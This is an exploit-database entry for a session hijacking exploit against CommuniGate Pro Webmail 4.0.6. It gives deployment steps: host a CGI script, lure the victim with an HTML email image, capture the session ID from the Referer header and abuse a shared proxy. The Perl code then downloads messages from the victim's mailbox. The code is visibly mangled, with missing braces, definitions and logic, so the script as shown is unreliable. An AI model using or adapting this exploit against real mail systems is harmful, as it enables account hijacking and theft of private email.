CommuniGate Pro Webmail 4.0.6 Session Hijacking Exploit

ID 1337DAY-ID-8304
Type zdt
Reporter Yaroslav Polyakov
Modified 2003-05-05T00:00:00


Exploit for linux platform in category remote exploits

CommuniGate Pro Webmail 4.0.6 Session Hijacking Exploit


# Below is exploit code. Place it into cgi-bin, then
# (recommended) make symlink from
# DocumentRoot/AnyImage.gif to, configure
# at least $url variable, and possible other vars and
# send victim HTML message with img src to your
# AnyImage.gif. When victim will read message, script
# will download messages 1..10 from his mailbox (if
# sucessfull).

# Script will work even if "require fixed address" option
# enabled (set $abuseproxy=1), but it needs access to
# users proxy (IP will be detected automatically). So, if
# your victim uses same corporate proxy as you, then 
# you're lucky, you can own his mailbox! :)

# If victim uses HTTPS to access CGP webmail, use
# https:// link to image. some browsers will still send
# HTTP_REFERER if _both_ sites are https.
# session hijacking and mail downloading exploit for CommuniGatePro 4.0.6
# Yaroslav Polyakov. [email protected]

use LWP::UserAgent;

# configuration vars

sub printgif

  print "Content-Type: image/gif\n";
  print "\n";
  print "$gif1x1";

open LOG, "> $logfile" || die("cant write to my log");

print LOG "remote: $remote\nreferer: $referer\n";
# if($referer=~/SID=([0-9a-zA-Z\-]+)/){
                print LOG "SID: $SID\n";
                                print LOG "sorry, cant
find out SID\n";

# create request
my $ua = new LWP::UserAgent;
$ua->agent("shj - sysAttack CGP session HiJack/1.0");

                print LOG "set proxy

                $eurl =~ s/%N%/$index/;
                $eurl =~ s/%SID%/$SID/;
                print LOG "fetching $eurl\n";
                $request = new HTTP::Request("GET", $eurl);
                $response = $ua->request($request);
                                print LOG
$response->code." ".$response->message
                                open MSG, ">
$msgprefix$index" or die('cant crea
te $msgprefix$index');
                                print MSG
                                close MSG;
                                print LOG "undefined
close LOG;


# [2018-02-05]  #